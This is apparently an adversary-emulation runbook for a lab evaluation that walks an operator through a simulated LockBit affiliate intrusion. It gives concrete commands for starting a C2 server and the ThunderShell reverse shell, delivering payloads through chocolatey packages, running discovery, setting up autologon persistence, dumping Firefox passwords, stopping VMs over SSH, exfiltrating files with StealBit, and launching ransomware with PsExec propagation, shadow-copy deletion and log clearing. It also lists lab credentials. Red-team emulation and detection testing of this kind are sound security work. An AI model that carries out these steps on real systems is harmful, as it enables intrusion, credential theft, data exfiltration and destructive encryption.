# LockBit Scenario Overview

Legend of symbols:

• 💡 - callout notes
• ❗ - extremely important note
• ➡️ - Switching to another session
• ⭕ - Disconnect from RDP
• 🔴 - Sign out of RDP
• 📷 - take a screenshot
• 🕑 - Record timestamp

---

# Step 0 - Red Setup

# :biohazard: Procedures

• Initiate an RDP session to the Kali attack host corsair (223.246.0.70)

  IP	Username	Password
  223.246.0.70	op1	Subpar-Parabola

• In a new terminal window, start the evalsC2server, ensuring the following handlers are enabled:

  • Simple File Server
  • StealBit

  cd LockBit/Resources/control_server
  sudo go build -o controlServer main.go
  sudo ./controlServer -c config/lockbit.yml

• Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of the evalsC2client.py and use this terminal for tasking implants.

  cd LockBit/Resources/control_server

• In a new terminal window elevate to sudo

  sudo su

  Password
  Subpar-Parabola

• Start the ThunderShell server:

  cd LockBit/Resources/ThunderShell
  LD_LIBRARY_PATH=/home/kali/.pyenv/versions/3.7.17/lib:$LD_LIBRARY_PATH
  PYTHONPATH=/home/kali/.pyenv/versions/3.7.17/lib/python3.7/site-packages:$PYTHONPATH
  PATH=/home/kali/.pyenv/versions/3.7.17/bin:$PATH
  python3.7 ThunderShell.py default.json kali

# Step 0 - Range Setup

# :biohazard: Procedures

• On the taskbar in Kali, click the Firefox icon to open Mozilla Firefox. Within Firefox Browse to the following URL http://27.21.12.121:8081/nexus.

• Log in using the following credentials.

  Username	Password
  admin	admin123

• On the left hand side, select repositories, then click the chocolatey-hosted repository.

• On the bottom half of the screen select NuPkg Upload > Browse....

• Browse to LockBit/Resources/payloads/, select the .NuGet package to upload, then press Add Package. Repeat this for each of the following:

  • BlockLit.1.0.1.nupkg (LockBit Payload)
  • Connhost.1.0.1.nupkg (StealBit Payload)
  • FoxAdminPro.1.0.1.nupkg (Firefox password stealer)
  • Termini.1.0.1.nupkg (Thundershell reverse shell)

• After ALL four (4) packages have been added, press Upload Package(s).

# Step 1 - Initial Access (Evaluation Step 9)

# 🎤 Voice Track

The LockBit affiliate gains initial access to the victim environment via compromised credentials providing VNC access to quirrell (10.111.9.202) as decryptmalfoy.net\gornuk.

# :biohazard: Procedures

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), search for and open TightVNC > TightVNC Viewer. Enter the following to connect to quirrell (10.111.9.202), click the Connect button then paste the password into the password field when prompted:

  VNC server	Password
  10.111.9.202::5900	test1234

• ➡️ log in using gornuk's credentials

  Username	Password
  decryptmalfoy\gornuk	Concave-Monsieur

• 📷 Screenshot the vnc connection

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 2 - Execution (Evaluation Step 10)

# 🎤 Voice Track

The LockBit affiliate executes several discovery commands to enumerate domain controllers, domain trusts, cached passwords, domain and local groups, and services running on quirrell (10.111.9.202).

# :biohazard: Procedures

• Within your TightVNC session to quirrell (10.111.9.202), search for Command Prompt and right-click to Run as Administrator

• Within the Command Prompt, execute the following to discover domain information:

  nltest /dclist:decryptmalfoy.net & cmdkey /list & net group "Domain Admins" /domain & net group "Enterprise Admins" /domain & net localgroup Administrators /domain & net localgroup Administrators

• 📷 Screenshot the command output.

• Within the Command Prompt, execute the following to gather information about running services:

  powershell /c "get-wmiobject Win32_Service |where-object { $_.PathName -notmatch \"C:\Windows\" -and $_.State -eq \"Running\"} | select-object name, displayname, state, pathname"

• 📷 Screenshot the command output.

• Minimize the elevated Command Prompt for later use

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 3 - Persistence (Evaluation Step 11)

# 🎤 Voice Track

The LockBit affiliate installs persistence on quirrell (10.111.9.202) by modifying the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon subkey to enable automatic login.

# :biohazard: Procedures

• Within your TightVNC session to quirrell (10.111.9.202), search for Registry Editor and right-click to Run as Administrator.

• Browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and add/edit the following:

  • AutoAdminLogin
    • Click Edit > New > String Value (if the value already exists, modify the existing one)
    • Type AutoAdminLogon, press Enter then double click the new key AutoAdminLogon
    • In the Edit String dialog, type 1 for "Value data" then click OK
  • DefaultUserName
    • Click Edit > New > String Value (if the value already exists, modify the existing one)
    • Type DefaultUserName, press Enter then double click the new key DefaultUserName
    • In the Edit String dialog, type gornuk for "Value data" then click OK
  • DefaultPassword
    • Click Edit > New > String Value (if the value already exists, modify the existing one)
    • Type DefaultPassword, press Enter then double click the new key DefaultPassword
    • In the Edit String dialog, type Concave-Monsieur for "Value data" then click OK
  • DefaultDomainName
    • Click Edit > New > String Value (if the value already exists, modify the existing one)
    • Type DefaultDomainName, press Enter then double click the new key DefaultDomainName
    • In the Edit String dialog, type decryptmalfoy for "Value data" then click OK

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 4 - Credential Access (Evaluation Step 12)

# 🎤 Voice Track

The LockBit affiliate ingresses the FireFox password dumper using chocolatey then dumps passwords from the FireFox browser, recovering the domain admin credentials to access the Linux KVM server.

# :biohazard: Procedures

• Within your TightVNC session to quirrell (10.111.9.202), using the elevated Command Prompt minimized earlier, execute chocolatey to download the FireFox password dumper:

  choco install FoxAdminPro -y

• 📷 Screenshot the FoxAdminPro screenshot.

• Within the Command Prompt, execute the FireFox password dumper:

  FoxAdminPro -d C:\Users\gornuk\AppData\Roaming\Mozilla\Firefox\Profiles\ohbrdd1o.default-release\

• 📷 Screenshot the command output.

• Confirm the output contains the domain admin credentials

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 5 - Lateral Movement to Linux Server (Evaluation Step 13)

# 🎤 Voice Track

The LockBit affiliate uses the recovered password to SSH to the Linux KVM server horcrux (10.111.8.40). After performing discovery, the LockBit affiliate performs the following actions:

• Stop virtual machines
• Disable autostart

# :biohazard: Procedures

• Within the elevated Command Prompt, SSH to the Linux KVM server horcrux (10.111.8.40):

  ssh gornuk.da@10.111.8.40

  Password
  Frown-Cement

• Within the SSH prompt, enumerate virtual machines running:

  sudo podman ps -a

• 📷 Screenshot the command output.

• Within the SSH prompt, execute the following commands:

  • Stop virtual machines

    sudo podman stop -a

  • Disable autostart

    sudo systemctl disable --now podman
    sudo systemctl disable --now podman-restart

  • 📷 Screenshot the command output.

• Exit the SSH prompt

  exit

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 6 - Privilege Escalation and Command & Control (Evaluation Step 14)

# 🎤 Voice Track

The LockBit affiliate ingresses ThunderShell, a PowerShell based remote access tool, using chocolatey. The LockBit affiliate then opens PowerShell with administrative privileges and executes ThunderShell.

ThunderShell establishes communications over HTTP to the adversary C2 server.

# :biohazard: Procedures

• Within the elevated Command Prompt, execute chocolatey to download ThunderShell

  choco install Termini -y

• 📷 Screenshot the installation output.

• Search for PowerShell and right-click to Run as Administrator

• Paste the following commands into the PowerShell Window and press enter

  Set-ExecutionPolicy bypass
  import-module C:\ProgramData\chocolatey\lib\Termini\tools\termini.ps1

• Press [A] or [Y] and press [ENTER] when prompted.

• Minimize all windows on quirrell (10.111.9.202) then minimize the VNC

• ➡️ Switch to Kali and confirm in the ThunderShell C2 tab the C2 registration of a new ThunderShell implant

• 📷 Screenshot the Thundershell terminal window showing the new session.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 7 - Exfiltration (Evaluation Step 15)

# 🎤 Voice Track

Leveraging ThunderShell to remotely access quirrell (10.99.9.202), the LockBit affiliate executes chocolatey to download StealBit for file discovery, system information gathering, and data exfiltration.

StealBit is an exfiltration tool utilizing native APIs and threading to optimize execution and exfiltration of files. It also performs the following behaviors:

• Checks if being debugged and infinitely loops
• Recursively enumerates folders and files, avoiding deny-list items
• Checks C2 server connectivity using an HTTP GET request
• Exfiltrates files using HTTP PUT requests
• Deletes itself on completion

# :biohazard: Procedures

• In the ThunderShell prompt, enter the following command to interact with the newly registered shell:

  interact 1

• In the shell interaction prompt, enter the following command to download StealBit to quirrell (10.111.9.202):

  choco install connhost -y

• 📷 Screenshot the connhost install output.

• In the shell interaction prompt, enter the following command to execute StealBit:

  connhost.exe C:\\Users\\ -d

• Switch to the evalsC2server tab and confirm the exfiltrated files were received successfully. The ThunderShell prompt should print out the following once StealBit has finished execution:

  [DEBUG] [2024-07-12T13:13:11] Closing completion port handle.

• 📷 Screenshot the Thundershell window containing the StealBit output when it's finished running.

• 📷 Screenshot the C2 server window containing the StealBit output when it's finished running.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

# Step 8 - Impact (Evaluation Step 16)

# 🎤 Voice Track

After exfiltration has completed, the LockBit affiliate leverages ThunderShell to execute chocolatey to download then execute the LockBit ransomware at C:\ProgramData\chocolatey\lib\BlockLit\tools\main.exe.

The LockBit ransomware will perform the following behaviors:

• Hides threads from debuggers
• Uses Windows API hashing to perform dynamic API resolution for certain APIs
• Gathers username, domain, and hostname information
• Gathers system information (OS version and architecture)
• Create a mutex to ensure unique execution
• Check system install and default UI languages against allow-list to avoid executing on certain systems
• Enumerates all logical drives to determine encryption targets
• Modifies several registry keys to disable the Windows firewall
• Deletes shadow copies using WMI and Windows API calls
• Uses bcdedit.exe to disable automatic Windows recovery features
• Discovers and pings the local network for discovery of additional targets
• Propagates using PsExec
• Terminates processes that may interfere with encryption
• Terminates and disables services that may interfere with encryption
• Clears the Recycle Bin
• Sets a custom icon for encrypted files with the .sk12uyqzk extension via registry writes to HKCR
• Generates 2048-bit RSA session keys to encrypt the AES keys used for file encryption and stores them in HKCU\SOFTWARE\BlockBlit
• Enumerates and encrypts target files in each discovered drive using 256-bit AES
  • Main C: drive and the discovered mounted file share Z: drive
• Drops a ransom note in traversed directories
• Changes the desktop background using registry writes to HKCU\Control Panel\Desktop
• Clears Windows Event logs and disables event log channels
• Deletes itself on completion by dropping and executing an embedded helper executable at C:\Windows\Temp\381jwk.tmp.
  • The helper executable will overwrite and rename the LockBit binary prior to removing it from disk.

# :biohazard: Procedures

• Switch to the ThunderShell tab and enter the following command to download LockBit to quirrell (10.99.9.202):

  choco install BlockLit -y

• 📷 Screenshot the installation output in the Thundershell window.

• In the shell interaction prompt, enter the following command to execute LockBit with propagation enabled:

  C:\ProgramData\chocolatey\lib\BlockLit\tools\main.exe -ps

• LockBit will return execution output to the Thundershell prompt when complete (allow 10-15 minutes for completion)

• 📷 Screenshot the Thundershell window containing the LockBit output.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

---

# 🔚 End of Execution